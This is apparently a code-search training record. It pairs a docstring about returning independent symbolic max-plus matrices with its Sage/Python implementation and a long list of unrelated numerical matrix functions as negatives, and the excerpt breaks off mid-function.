"0.51278394", "0.51167244", "0.51126456", "0.5103993", "0.510277", "0.50977796", "0.50955623", "0.5077434", "0.50731003", "0.5068964", "0.5067611", "0.5064672", "0.5056716", "0.505666", "0.505613", "0.50490165", "0.5041239", "0.5032271", "0.5032065", "0.5026967", "0.5021533", "0.50180745", "0.5011186", "0.501036", "0.5004049", "0.49969843", "0.49966446", "0.49963754" ]
0.0
-1
r""" Return ``n`` independent symbolic matrices in dimension ``d``.
def symbolic_max_plus_matrices(d, n, ch=None, typ='sym'): d = int(d) n = int(n) if d <= 0: raise ValueError("d (= {}) must be postive".format(d)) nvar = n * d * d V = FreeModule(ZZ, nvar) B = ((b,) for b in V.basis()) matrices = [] if d == 1: typ = 'full' if typ == 'sym' or typ == 'quick': z = [0]*nvar for i in range(n): z[i*d*d] = 1 diag = (V(z),) z[i*d*d] = 0 z[i*d*d+1] = 1 nondiag = (V(z),) z[i*d*d+1] = 0 if typ == 'sym': matrices.append(SymbolicSymmetricMaxPlusMatrix(d, n, diag, nondiag, ch)) else: matrices.append(QuickSymbolicSymmetricMaxPlusMatrix(d, n, diag, nondiag, ch)) elif typ == 'full': for i in range(n): mat = [] for j in range(d): mat.append([next(B) for k in range(d)]) matrices.append(SymbolicMaxPlusMatrix(d, nvar, mat, ch)) else: raise ValueError return matrices
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def basis(d, symbolic=True):\n X = sym.symbols('X')\n if d == 0:\n phi_sym = [1]\n else:\n if symbolic:\n h = sym.Rational(1, d) # node spacing\n nodes = [2*i*h - 1 for i in range(d+1)]\n else:\n nodes = np.linspace(-1, 1, d+1)\n \n phi_sym = [Lagrange_polynomials(X, r, nodes) for r in range(d+1)]\n \n # Transform to Python functions\n phi_num = [sym.lambdify([X], phi_sym[r], modules='numpy') for r in range(d+1)]\n return phi_sym if symbolic else phi_num", "def makeHadamard(n, d):\n return [[1 if d[\"r%dc%d\" % (i, j)] else 0 for j in range(n)] for i in range(n)]", "def matIxs( n ):\n rows, cols = np.indices( (n,n) )\n row = rows.flatten()\n col = cols.flatten()\n \n return map( lambda x: Vector( x[0], x[1] ), zip( col, row ) )", "def matrix_chain_dynamic(dimensions, n):\n\n m = [[-1 for _ in range(n)] for _ in range(n)]\n s = [[0 for _ in range(n)] for _ in range(n)]\n\n # multiplying matrix by itself\n for i in range(1, n):\n m[i][i] = 0\n\n for length in range(2, n):\n for i in range(1, n - length + 1):\n j = i + length - 1\n for k in range(i, j):\n cost = m[i][k] + m[k + 1][j] + dimensions[i - 1] * dimensions[k] * dimensions[j]\n if cost > m[i][j]:\n m[i][j] = cost\n # index if splitting\n s[i][j] = k\n return m, s", "def find_linear_recurrence(self,n,d=None,gfvar=None):\n from sympy.simplify import simplify\n x = [simplify(expand(t)) for t in self[:n]]\n lx = len(x)\n if d is None:\n r = lx//2\n else:\n r = min(d,lx//2)\n coeffs = []\n for l in range(1, r+1):\n l2 = 2*l\n mlist = []\n for k in range(l):\n mlist.append(x[k:k+l])\n m = Matrix(mlist)\n if m.det() != 0:\n y = simplify(m.LUsolve(Matrix(x[l:l2])))\n if lx == l2:\n coeffs = flatten(y[::-1])\n break\n mlist = []\n for k in range(l,lx-l):\n mlist.append(x[k:k+l])\n m = Matrix(mlist)\n if m*y == Matrix(x[l2:]):\n coeffs = flatten(y[::-1])\n break\n if gfvar is None:\n return coeffs\n else:\n l = len(coeffs)\n if l == 0:\n return [], None\n else:\n n, d = x[l-1]*gfvar**(l-1), 1 - coeffs[l-1]*gfvar**l\n for i in range(l-1):\n n += x[i]*gfvar**i\n for j in range(l-i-1):\n n -= coeffs[i]*x[j]*gfvar**(i+j+1)\n d -= coeffs[i]*gfvar**(i+1)\n return coeffs, simplify(factor(n)/factor(d))", "def symbolic_max_plus_identity(d, nvar, ch=None):\n d = int(d)\n nvar = int(nvar)\n V = FreeModule(ZZ, nvar)\n e = ()\n zero = (V([0]*nvar),)\n\n data = [[zero if i == j else e for j in range(d)] for i in range(d)]\n return SymbolicMaxPlusMatrix(d, nvar, data, ch)", "def _identity_dense(d, dtype=complex):\n return np.eye(d, dtype=dtype)", "def solve(n=10):\n return sum(M_N_S(n, d)[2] for d in range(10))", "def _relax_matrix(self, n=1):\n\n for i in range(n):\n self.level.mid.reshape(-1)[:] = self.R_w.dot(self.level.mid.reshape(-1)) \\\n + self.omega * self.level.rhs / self.D", "def diag_indices(n, ndim=2):\n\n if not use_origin_backend():\n return dpnp_diag_indices(n, ndim)\n\n return call_origin(numpy.diag_indices, n, ndim)", "def expansion_matrix_d(self):\n row = self._base_nlp._d_map\n nnz = len(self._base_nlp._d_map)\n col = np.arange(nnz, dtype=np.int)\n data = np.ones(nnz)\n return csr_matrix((data, (row, col)), shape=(self.ng, nnz))", "def random_planted_matrix(d, n, replace='True'):\n all_idx = np.asarray(list(zip(*np.tril_indices(d,-1))))\n chosen_idx_positions = np.random.choice(len(all_idx), size=n, replace=replace)\n subspaces = all_idx[chosen_idx_positions]\n angles = 2*np.pi * (np.random.rand(len(subspaces)) - 0.5)\n U = np.eye(d)\n for s, alpha in zip(subspaces, angles):\n U = right_givens(math.cos(alpha), math.sin(alpha), U, s[0], s[1])\n return U", "def construct_M_N(n):\n n2 = n**2\n D0 = 2*np.ones(n2) # 0th diagonal\n D1 = - np.ones(n2 - 1) # -1st, 1st diagonals\n D1[n-1::n] = 0 # Setting every k*n-1 entries = 0 for k < n\n DN = - np.ones(n2 - n) # -nth, nth diagonals\n return (scipy.sparse.diags((D1, D0, D1), (-1, 0, 1), shape=(n2, n2), format=\"csr\"),\n scipy.sparse.diags((DN, D0, DN), (-n, 0, n), shape=(n2, n2), format=\"csr\"))", "def diag_indices(n, ndim=2):\r\n idx = np.arange(n)\r\n return (idx,) * ndim", "def dens_matrix(state):\n size = len(state)\n state_conj = np.conj(state)\n dm = np.zeros((size,) * 4, dtype=complex)\n\n for p1 in range(size):\n for p2 in range(size):\n for p1_ in range(size):\n for p2_ in range(size):\n dm[p1, p2, p1_, p2_] = state[p1, p2] * state_conj[p1_, p2_]\n\n return dm", "def Dinvmatrix(N):\r\n import numpy as np\r\n D = np.zeros((N,N,2))\r\n D[:,:,0] = np.diag((np.append(np.ones((1,int(N/2))),np.zeros((1,int(N/2))))))\r\n D[:,:,1] = np.diag((np.append(np.zeros((1,int(N/2))),np.ones((1,int(N/2))))))\r\n return D", "def symmetrize(n):\n times = lambda x: jnp.concatenate((jnp.flipud(x), x))\n trans = lambda x: x[n:] + x[n-1::-1]\n return Operator(times=times, trans=trans, shape=(2*n,n))", "def get_matrixS(n):\n\n mat_nxn = np.zeros([n, n], dtype=int)\n for row_num in range(1, n + 1):\n i = row_num - 1\n if row_num == 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i + 2] = 1\n elif row_num == 2:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i + 2] = 1\n elif row_num == n - 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num == n:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num % 2 == 1:\n mat_nxn[i][i + 1] = 1\n mat_nxn[i][i + 2] = 1\n mat_nxn[i][i - 2] = 1\n elif row_num % 2 == 0:\n mat_nxn[i][i - 1] = 1\n mat_nxn[i][i + 2] = 1\n mat_nxn[i][i - 2] = 1\n mat_nxn = mat_nxn + np.eye(n, dtype=int)\n mat_2nx2n = np.repeat(np.repeat(mat_nxn, 2, 0), 2, 1)\n return torch.as_tensor(mat_2nx2n)", "def dirac(self,n):\r\n y = np.zeros(len(n),dtype = complex)\r\n y[n==0] = 1\r\n return y", "def all_basis_vectors(n: int) -> list:\n assert n >= 0, \"n must be > 0\"\n basis_1dim = ['0', '1']\n\n if n == 0:\n return []\n if n == 1:\n return basis_1dim\n else:\n current_basis = basis_1dim\n for i in range(1, n):\n # can be made more efficient (e.g. by current_basis, current basis until we reach sqrt(n))\n current_basis = outer_subspace_product(basis_1dim, current_basis)\n\n return current_basis", "def _compute_ind_mat(n, m, nb_coeff):\r\n\r\n ind_mat = np.zeros((nb_coeff, n))\r\n curr_idx = 0\r\n for indexes in itr.combinations_with_replacement(range(m), n):\r\n ind_mat[curr_idx] = np.array(indexes)\r\n curr_idx += 1\r\n\r\n return ind_mat", "def matrix_N1(l, omega, S, cn):\n sqrt = np.sqrt(l * (l + 1))\n zl = omega * S / cn['l']\n zt = omega * S / cn['t']\n col1 = - np.array((dN1(l, zt), dN2(l, zt), dN3(l, zt), dN4(l, zt))) / zt\n col2 = (sqrt * np.array((dL1(l, zt), dL2(l, zl),\n dL3(l, zl), dL4(l, zt, zl))) / zl\n )\n N = np.array((col1, col2))\n return N.T", "def novelty(self, d, x):\n # measure the data and check if the dimmension agree\n N = len(x)\n if not len(d) == N:\n raise ValueError('The length of vector d and matrix x must agree.')\n self.n = len(x[0])\n # prepare data\n try:\n x = np.array(x)\n d = np.array(d)\n except:\n raise ValueError('Impossible to convert x or d to a numpy array')\n # create empty arrays\n y = np.zeros(N)\n e = np.zeros(N)\n nd = np.zeros((N,self.n))\n self.w_history = np.zeros((N,self.n))\n # adaptation loop\n for k in range(N):\n self.update_memory_x(x[k])\n m_d, m_x = self.read_memory()\n # estimate\n y[k] = np.dot(self.w, x[k]-m_x) + m_d\n e[k] = d[k] - y[k]\n nu = self.mu / (self.eps + np.dot(x[k]-m_x, x[k]-m_x))\n dw = nu * e[k] * (x[k]-m_x)\n self.w += dw\n self.w_history[k,:] = self.w\n nd[k,:] = dw * e[k]\n self.update_memory_d(d[k])\n return y, e, self.w_history, nd", "def all_matrices(n):\n complete = int(n * (n-1) / 2)\n least = (n-1)*2 - 1 # the number of edges is at least 2(n-1)-1\n all_possible_list = [i for i in itertools.product([0, 1], repeat=complete)\n if sum(i) >= least]\n all_mats = [create_matrix(i, n) for i in all_possible_list]\n return all_mats", "def get_dct_matrix(N):\r\n dct_m = np.eye(N)\r\n for k in np.arange(N):\r\n for i in np.arange(N):\r\n w = np.sqrt(2 / N)\r\n if k == 0:\r\n w = np.sqrt(1 / N)\r\n dct_m[k, i] = w * np.cos(np.pi * (i + 1 / 2) * k / N)\r\n idct_m = np.linalg.inv(dct_m)\r\n return dct_m, idct_m", "def identity_matrix(n):\n data = [[1 if c == r else 0 for c in range(n)] for r in range(n)]\n return Matrix(data)", "def _dmatrix(kn_u, kn_d):\n d = np.zeros((kn_u.size, 4, 4), np.complex128)\n d_inv = np.zeros_like(d)\n\n d[:, 0, 0] = 1\n d[:, 0, 1] = 1\n d[:, 1, 0] = kn_u\n d[:, 1, 1] = -kn_u\n\n d[:, 2, 2] = 1\n d[:, 2, 3] = 1\n d[:, 3, 2] = kn_d\n d[:, 3, 3] = -kn_d\n\n # an analytic matrix inverse saves time\n inv_kn_u = 0.5 / kn_u\n inv_kn_d = 0.5 / kn_d\n\n d_inv[:, 0, 0] = 0.5\n d_inv[:, 0, 1] = inv_kn_u\n d_inv[:, 1, 0] = 0.5\n d_inv[:, 1, 1] = -inv_kn_u\n\n d_inv[:, 2, 2] = 0.5\n d_inv[:, 2, 3] = inv_kn_d\n d_inv[:, 3, 2] = 0.5\n d_inv[:, 3, 3] = -inv_kn_d\n\n return d, d_inv", "def decomposition_into_s_n_irreducibles(self, n):\r\n w5 = partitions_list(n)\r\n M5 = form_matrix_yt(w5)\r\n card = math.factorial(n)\r\n vec_dic = {}\r\n for k in range(self.dimension()+1):\r\n D = {}\r\n uu = []\r\n vv = []\r\n p = k \r\n A = self.matrix_simmetric_representate(p)\r\n if (p >0 and (p <= self.dimension())):\r\n null = nullspace(A)\r\n w3 = []\r\n for i in range(len(null[0])):\r\n w = []\r\n for j in range(len(null)):\r\n w.append(null[j][i])\r\n w3.append(w) \r\n null = w3\r\n M = np.matrix(w3, dtype= np.float64).transpose()\r\n Mi = np.linalg.pinv(M)\r\n else:\r\n if (p == 0):\r\n M = A\r\n null = []\r\n for i in range(A.shape[0]):\r\n aux = []\r\n for j in range(A.shape[1]):\r\n aux.append(M[i,j])\r\n null.append(aux)\r\n M = np.matrix(null, dtype=np.float64)\r\n Mi = M\r\n p = k + 1\r\n if (p>0 and (p <= self.dimension())):\r\n A1=self.matrix_simmetric_representate(p)\r\n col = columnspace(A1)\r\n w4 = []\r\n for i in range(len(col[0])):\r\n w = []\r\n for j in range(len(col)):\r\n w.append(col[j][i])\r\n w4.append(w)\r\n col = w4\r\n M1 = np.matrix(w4, dtype=np.float64).transpose()\r\n Mii = np.linalg.pinv(M1)\r\n for h in w5:\r\n p = k \r\n if (p >0 and (p <= self.dimension())):\r\n if (all(elem == 0 for elem in null[0])):\r\n l1 = 0\r\n else:\r\n he = self.basis_group_oriented_p_chains(p) \r\n on1 = np.ones(len(list(he.dic.keys())), dtype=np.float64) \r\n v = P_chains([],[])\r\n v = P_chains(list(he.dic.keys()),on1)\r\n v1 = permutation_in_simplex_test(v, make_permutation(h))\r\n D1={}\r\n c1 = 0\r\n for i in list(v1.dic.keys()):\r\n c2 = 1\r\n for j in list(he.dic.keys()):\r\n if (i == j):\r\n if (v1.dic[i] == he.dic[j]):\r\n D1[c1] = c2\r\n else:\r\n D1[c1] = -c2\r\n c2 = c2 + 1\r\n c1 = c1 + 1\r\n rr = M.shape[0]\r\n cc = M.shape[1]\r\n Ma = np.zeros([rr,cc],dtype=np.float64)\r\n for i in range(rr):\r\n Ma[i,:] = (M[(abs(D1[i])-1),:]*(np.sign(D1[i])))\r\n l1 = 0\r\n for j in range(cc):\r\n l1 = np.dot(Mi[j,:],Ma[:,j])[0,0] + l1\r\n else:\r\n if (p == 0):\r\n he = self.basis_group_oriented_p_chains(p) \r\n on1 = np.ones(len(list(he.dic.keys())), dtype=np.float64) \r\n v = P_chains([],[])\r\n v = P_chains(list(he.dic.keys()),on1)\r\n v1 = permutation_in_simplex_test(v, make_permutation(h))\r\n D1={}\r\n c1 = 0\r\n for i in list(v1.dic.keys()):\r\n c2 = 1\r\n for j in list(he.dic.keys()):\r\n if (i == j):\r\n if (v1.dic[i] == he.dic[j]):\r\n D1[c1] = c2\r\n else:\r\n D1[c1] = -c2\r\n c2 = c2 + 1\r\n c1 = c1 + 1\r\n rr = M.shape[0]\r\n cc = M.shape[1]\r\n Ma = np.zeros([rr,cc],dtype=np.float64)\r\n for i in range(rr):\r\n Ma[i,:] = (M[(abs(D1[i])-1),:]*(np.sign(D1[i])))\r\n l1 = 0\r\n for j in range(cc):\r\n l1 = np.dot(Mi[j,:],Ma[:,j])[0,0] + l1\r\n else:\r\n l1 = 0\r\n p = k + 1\r\n if (p>0 and (p <= self.dimension())):\r\n hi = self.basis_group_oriented_p_chains(p-1) \r\n on1i = np.ones(len(list(hi.dic.keys())), dtype=np.float64) \r\n vi = P_chains([],[])\r\n vi = P_chains(list(hi.dic.keys()),on1i)\r\n v1i = permutation_in_simplex_test(vi, make_permutation(h))\r\n D1i={}\r\n c1 = 0\r\n for i in list(v1i.dic.keys()):\r\n c2 = 1\r\n for j in list(hi.dic.keys()):\r\n if (i == j):\r\n if (v1i.dic[i] == hi.dic[j]):\r\n D1i[c1] = c2\r\n else:\r\n D1i[c1] = -c2\r\n c2 = c2 + 1\r\n c1 = c1 + 1\r\n rr = M1.shape[0]\r\n cc = M1.shape[1]\r\n Mai = np.zeros([rr,cc],dtype=np.float64)\r\n for i in range(rr):\r\n Mai[i,:] = (M1[(abs(D1i[i])-1),:]*(np.sign(D1i[i])))\r\n l2 = 0\r\n for j in range(cc):\r\n l2 = np.dot(Mii[j,:],Mai[:,j])[0,0] + l2\r\n else:\r\n l2 = 0\r\n uu.append(l1-l2) \r\n vv.append(size_conjugacy_class(h,n))\r\n for i in range(M5.shape[0]):\r\n Ip = 0\r\n for j in range(M5.shape[1]):\r\n Ip = Ip + M5[i,j]*uu[j]*vv[j]\r\n Ip = Ip/card\r\n D[tuple(w5[i])] = abs(round(Ip))\r\n '''Note that I am using round, only because the results obtained are \r\n not esthetics'''\r\n vec_dic[k] = D\r\n return vec_dic", "def I(n):\n identity = Matrix(n,n)\n print identity.matrix\n index = 0 \n for i in range(identity.nrows):\n for j in range(identity.ncols):\n identity.matrix[i][index] = 1\n index += 1\n\n\n flat = []\n for i in range(identity.nrows):\n for j in range(identity.ncols):\n flat.append(identity.matrix[i][j])\n\n\n return identity", "def expansion_matrix_dl(self):\n\n row = self._base_nlp._lower_d_map\n nnz = len(self._base_nlp._lower_d_map)\n col = np.arange(nnz, dtype=np.int)\n data = np.ones(nnz)\n return csr_matrix((data, (row, col)), shape=(self.nd, nnz))", "def modalDiffMatrix(n):\n k = np.arange(n)\n a = (-1)**k\n A = sp.triu(1-np.outer(a,a))\n D = np.dot(A,np.diag(k))\n D[0,:] = D[0,:]/2\n return D", "def D2mat(numpts, delta=1, periodic=True, q=0):\n\n a = 1. / delta ** 2 * ones(numpts)\n b = -2. / delta ** 2 * ones(numpts)\n c = 1. / delta ** 2 * ones(numpts)\n #print \"delta = %f\" % (delta)\n if periodic:\n if q == 0:\n return sparse.spdiags([c, a, b, c, c], [-numpts + 1, -1, 0, 1, numpts - 1], numpts, numpts)\n else:\n return sparse.spdiags([exp(-(0. + 1.j) * q) * c, a, b, c, exp((0. + 1.j) * q) * c],\n [-numpts + 1, -1, 0, 1, numpts - 1], numpts, numpts)\n else:\n return sparse.spdiags([a, b, c], [-1, 0, 1], numpts, numpts)", "def Problem2(n):\n diag_entries = np.empty((3,n))\n diag_entries[0] = np.ones(n)*(-1)\n diag_entries[1] = np.ones(n)*2\n diag_entries[2] = np.ones(n)*(-1)\n A = sparse.spdiags(diag_entries, [-1,0,1],n,n,format=\"csr\")\n return A", "def create_matrix(n, m):\n matrix = [[None]*m for i in range(n)]\n return matrix", "def generate_basis(n, dim):\n planes = [np.random.randn(dim) for i in range(n)]\n return [p / np.linalg.norm(p) for p in planes]", "def gen_M_1d(k=None, n=None, sparse=True):\n if n is None:\n print(\"specify `n` in gen_M_1d\")\n sys.exit(0)\n\n if k is None:\n print(\"specify `k` in gen_M_1d\")\n sys.exit(0)\n\n ## find split1 and split 2 indices\n s1 = (n-k)/2\n s2 = n-(s1+k)\n\n ## build diagonal\n if sparse:\n data = np.ones(n)\n offsets = s1\n M = sps.dia_matrix((data,offsets), shape=(k,n))\n else:\n d = np.concatenate([np.zeros(s1), np.ones(k), np.zeros(s2)])\n M = np.diag(d)\n M = M[s1:(s1+k),:]\n return M", "def decomposition_into_s_n_irreducibles_chain_sp(self, n):\r\n w5 = partitions_list(n)\r\n M5 = form_matrix_yt(w5)\r\n card = math.factorial(n)\r\n vec_dic = {}\r\n for k in range(self.dimension()+1):\r\n D = {}\r\n uu = []\r\n vv = []\r\n he = self.basis_group_oriented_p_chains(k) \r\n for h in w5:\r\n v1 = P_chains([],[])\r\n v1 = permutation_in_simplex_test(he, make_permutation(h))\r\n rr = len(list(he.dic.keys()))\r\n Ma = np.zeros([rr,rr],dtype=np.float64)\r\n c1 = 0\r\n for i in list(he.dic.keys()):\r\n c2 = 0\r\n for j in list(v1.dic.keys()):\r\n if (i == j):\r\n Ma[c1,c2] = v1.dic[i]\r\n c2 = c2 + 1\r\n c1 = c1 + 1\r\n Ma = np.matrix(Ma, dtype='float64')\r\n uu.append(np.trace(Ma)) \r\n vv.append(size_conjugacy_class(h,n))\r\n for i in range(M5.shape[0]):\r\n Ip = 0\r\n for j in range(M5.shape[1]):\r\n Ip = Ip + M5[i,j]*uu[j]*vv[j]\r\n Ip = Ip/card\r\n D[tuple(w5[i])]=Ip\r\n vec_dic[k] = D\r\n return vec_dic", "def construct_matrix_A(n):\n n2 = n**2\n D0 = 4*np.ones(n2) # 0th diagonal\n D1 = - np.ones(n2 - 1) # -1st, 1st diagonals\n D1[n-1::n] = 0 # Setting every k*n-1 entries = 0 for k < n\n DN = - np.ones(n2 - n) # -nth, nth diagonals\n return scipy.sparse.diags((DN, D1, D0, D1, DN), (-n, -1, 0, 1, n),\n shape=(n2, n2), format=\"csr\")", "def get_feature_matrix(N, Xtrain, D):\n for i in range(D+1):\n if i == 0:\n X = [1] * N\n else:\n X = np.vstack([np.power(Xtrain, i), X])\n X = X.transpose()\n return X", "def magma_dnrm2(n, dx, incx, queue):\n\n return _libmagma.magma_dnrm2(n, int(dx), incx, queue)", "def __init__(self, n):\r\n self.size = n\r\n self.mat = []\r\n for i in range(n):\r\n self.mat.append([0] * n)", "def calc_einsum_idx(bits, n):\n assert len(bits) + n <= len(SYMBOLS)\n\n tens_in = SYMBOLS[:n]\n tens_out = list(tens_in)\n mat_left = ''\n mat_right = ''\n\n for pos, idx in enumerate(reversed(bits)):\n mat_left += SYMBOLS[-1 - pos]\n mat_right += tens_in[-1 - idx]\n tens_out[-1 - idx] = SYMBOLS[-1 - pos]\n tens_out = ''.join(tens_out)\n\n return mat_left + mat_right + ',' + tens_in + '->' + tens_out", "def identity_matrix(self, n):\r\n IdM = self.zeros_matrix(n, n)\r\n for i in range(n):\r\n IdM[i][i] = 1.0\r\n \r\n return IdM", "def coordinate_matrix(n):\n xcoordinates = np.zeros((n,n))\n xcoordinates = xcoordinates + np.arange(0,worksize) #broadcasting trick\n ycoordinates = xcoordinates.T\n return np.array([ycoordinates,xcoordinates])", "def d(n,m):\r\n integrand = lambda r: r**3*R(n,0,r)*R(m,1,r)\r\n integral = integrate.quad(integrand, 0, np.inf)\r\n\r\n return e*a0*integral[0]/np.sqrt(3)", "def get_nd_basis(n=5):\n assert n >= 0\n t = np.linspace(0, np.pi, n + 1)[:-1]\n xs = np.cos(t)\n ys = np.sin(t)\n return [(x, y) for x, y in zip(xs, ys)]", "def n_simplex(self, dim_n=3, project = True):\n verts = permutations([0 for i in range(dim_n)] + [1])\n if project: verts = [Polytopes.project_1(x) for x in verts]\n return Polyhedron(vertices = verts)", "def get_multivariate_matrix(x_data, D):\n rows = []\n terms = get_polynomial(['x1', 'x2', 'x3', 'x4', 'x5'], D)\n for row in range(len(x_data)):\n row_data = {}\n row_data['x1'] = x_data[row, 0]\n row_data['x2'] = x_data[row, 1]\n row_data['x3'] = x_data[row, 2]\n row_data['x4'] = x_data[row, 3]\n row_data['x5'] = x_data[row, 4]\n \n row_entry = []\n for t in terms:\n prod = 1\n for var in t:\n prod *= row_data[var]\n row_entry.append(prod)\n \n row_entry = np.array(row_entry) \n rows.append(row_entry)\n return np.vstack(rows)", "def drum_like_env(N, sr):\n ## TODO: Fill this in\n return np.zeros(N)", "def d_weights(n):\n i = np.arange(1, n)\n return np.sqrt(n / (i * (n - i)))", "def eye(cls, n, domain):\n # XXX: flint matrices do not have anything like eye\n return DDM.eye(n, domain).to_dfm()", "def basis_fns(n=0):\n return lambda x: np.sum(x ** (n+1), axis=1)", "def dens_matrix_4ch(state):\n size = len(state)\n state_conj = np.conj(state)\n dens_matrix = np.zeros((size,) * 8, dtype=complex)\n\n for p1 in range(size):\n for p2 in range(size):\n for p3 in range(size):\n for p4 in range(size):\n for p1_ in range(size):\n for p2_ in range(size):\n for p3_ in range(size):\n for p4_ in range(size):\n dens_matrix[p1, p2, p3, p4, p1_, p2_, p3_, p4_] = state[p1, p2, p3, p4] * state_conj[p1_, p2_, p3_, p4_]\n\n return dens_matrix", "def identity(n):\r\n I = np.zeros((n, n))\r\n diag = np.ones(n)\r\n np.fill_diagonal(I, diag)\r\n return matrix(I)", "def identMatrix(size):\n returnvalue = Matrix()\n for i in range(size):\n newrow = [0] * size\n newrow[i] = 1\n returnvalue.addRow(*newrow)\n return returnvalue", "def gen_density_matrix(states=None, dimensions=None):\n if states is None:\n tdim = np.prod(dimensions)\n dmtotal0 = np.eye(tdim) / tdim\n\n return dmtotal0\n\n dmtotal0 = np.eye(1, dtype=np.complex128)\n\n for i, s in enumerate(states):\n\n if not hasattr(s, \"__len__\"):\n # assume s is int or float showing the spin projection in the pure state\n d = dimensions[i]\n dm_nucleus = np.zeros((d, d), dtype=np.complex128)\n state_number = int(round((d - 1) / 2 - s))\n dm_nucleus[state_number, state_number] = 1\n\n else:\n if s.shape.__len__() == 1:\n d = dimensions[i]\n dm_nucleus = np.zeros((d, d), dtype=np.complex128)\n np.fill_diagonal(dm_nucleus, s)\n\n else:\n dm_nucleus = s\n\n dmtotal0 = np.kron(dmtotal0, dm_nucleus)\n\n return dmtotal0", "def direct_obs_matrix(Nx,obs_inds):\n Ny = len(obs_inds)\n H = zeros((Ny,Nx))\n H[range(Ny),obs_inds] = 1\n return H", "def generate(self, n, d):\n\n self.n = n\n self.d = d\n self.X = np.random.rand(n, d)\n self.Y = np.random.choice([0, 1], size=n)", "def dctmtx(n):\n x,y = np.meshgrid(range(n), range(n))\n D = np.sqrt(2.0/n) * np.cos(np.pi * (2*x+1) * y / (2*n))\n D[0] /= np.sqrt(2)\n return D", "def _fd_matrix(step_ratio, parity, nterms):\n _assert(0 <= parity <= 6,\n 'Parity must be 0, 1, 2, 3, 4, 5 or 6! ({0:d})'.format(parity))\n step = [1, 2, 2, 4, 4, 4, 4][parity]\n inv_sr = 1.0 / step_ratio\n offset = [1, 1, 2, 2, 4, 1, 3][parity]\n c0 = [1.0, 1.0, 1.0, 2.0, 24.0, 1.0, 6.0][parity]\n c = c0 / \\\n special.factorial(np.arange(offset, step * nterms + offset, step))\n [i, j] = np.ogrid[0:nterms, 0:nterms]\n return np.atleast_2d(c[j] * inv_sr ** (i * (step * j + offset)))", "def reflect(d,n):\n\t# coefficent c, because easier\n\tc = 2 * dot(d,n)\n\treturn [di - c * ni for (di, ni) in zip(d,n)]", "def exo4_q1(mu,n,x0,y0):\r\n #liste.append([x0,y0])\r\n absc = x0\r\n ordn = y0\r\n L = np.array([absc])\r\n M = np.array([ordn])\r\n for i in range(0,n):\r\n absc = exo2_1(absc,mu)\r\n ordn = exo2_1(ordn,mu)\r\n L = np.append(L,[absc])\r\n M = np.append(M,[ordn])\r\n return L,M", "def from_list_sympy(cls, nrows, ncols, rows, **kwargs):\n assert len(rows) == nrows\n assert all(len(row) == ncols for row in rows)\n\n items_sympy = [_sympify(item) for row in rows for item in row]\n\n domain, items_domain = cls.get_domain(items_sympy, **kwargs)\n\n domain_rows = [[items_domain[ncols*r + c] for c in range(ncols)] for r in range(nrows)]\n\n return DomainMatrix(domain_rows, (nrows, ncols), domain)", "def xyMatrixTransformMSD(d, m):\n functionSpace = np.zeros((d,d))\n for x in range(d):\n for y in range(d): \n xy = np.transpose([x, y])\n _xy = np.dot(m, xy)\n functionSpace[x, y] = int(str(_xy[0]*_xy[0]+_xy[1]*_xy[1])[0])\n \n return functionSpace", "def laplacian_mat(n):\n data = [1, -2, 1]*n\n i = flatten([[k,k,k] for k in range(n)])\n j = flatten([[k-1, k, k+1] for k in range(n)])\n return scipy.sparse.coo_matrix((data[1:-1], (i[1:-1], j[1:-1])))", "def generate_positive_semi_definite_matrix(n_dim):\n cov = np.random.randn(n_dim, n_dim)\n return np.dot(cov, cov.T)", "def mesh_uniform(N_e, d, Omega):", "def create_dims(self, n_vec, m_vec):\n dims_mat = np.array([], dtype=np.int64).reshape(2, 0)\n for n in n_vec:\n for m in m_vec[m_vec > n]:\n dims_mat = np.hstack((dims_mat,\n np.array([[n], [m]])))\n return dims_mat", "def LDL(A, d):\n n = shape(A)[0]\n L = array(eye(n))\n dg = zeros(n)\n dg[0] = A[0, 0]\n for k in range(1, n):\n m = reshape(array(A[:k, k].copy()), k)\n rforwardsolve(L[:k, :k], m, d)\n L[k, :k] = m/dg[:k]\n dg[k] = A[k, k] - dot(L[k, :k], m)\n return L, dg", "def get_omega_0(n_bits: int, as_numeric: bool = False) -> Matrix:\n q = qe.get_bit_map(len(DEPENDENTS), n_bits)\n mat = -q.T @ q + 4 * np.diag(np.sum(q, axis=0))\n return np.array(mat) if as_numeric else mat", "def ddL(n):\n\n\tif (n==0):\n\t\treturn lambda x: 0.0\n\n\telif (n==1):\n\t\treturn lambda x: 0.0\n\n\telse:\n\n\t\t# approximate by fitting polynomial and taking derivatives\n\t\tc_om1 = coef_approximation(L(n), n)\n\t\tc_prime = polynomial_derivative(c_om1)\n\t\tc_double_prime = polynomial_derivative(c_prime)\n\n\t\t# [TODO]: fix own method from Hw 3\n\t\treturn lambda x: np.polyval(c_double_prime, x)", "def matrix_L1(l, omega, S, cn):\n zt = omega * S / cn['t']\n L = np.array((dN2(l, zt), dN4(l, zt)))\n return L.T", "def matrix_N2(l, omega, S, cn):\n sqrt = np.sqrt(l * (l + 1))\n zl = omega * S / cn['l']\n zt = omega * S / cn['t']\n col1 = - np.array((wN1(l, zt), wN2(l, zt), wN3(l, zt), wN4(l, zt))) / zt\n col2 = (sqrt * np.array((wL1(l, zt), wL2(l, zl),\n wL3(l, zl), wL4(l, zl, zt))) / zl\n )\n N = np.array((col1, col2))\n return N.T", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def identity_matrix(n: int) -> Matrix:\n return make_matrix(n, n, lambda i, j: 1 if i == j else 0)", "def _lambda(m, d, Q):\n\n d_2 = int(d / 2)\n def y_i_j(i, j):\n poly = list(np.zeros((d + 1, 1)))\n for k in range(d_2 + 1):\n for l in range(d_2 + 1):\n poly[k + l] += Q[i + k * m, j + l * m]\n return poly\n\n mat_y = [[y_i_j(i, j) for j in range(m)] for i in range(m)]\n mat_y = np.array(mat_y)\n return mat_y", "def CreateDesignMatrix_X(z, x, y, n ):\n if len(x.shape) > 1:\n x = np.ravel(x)\n y = np.ravel(y)\n\n N = len(x)\n l = int((n+1)*(n+2)/2) \n X = np.ones((N,l))\n\n for i in range(1,n+1):\n q = 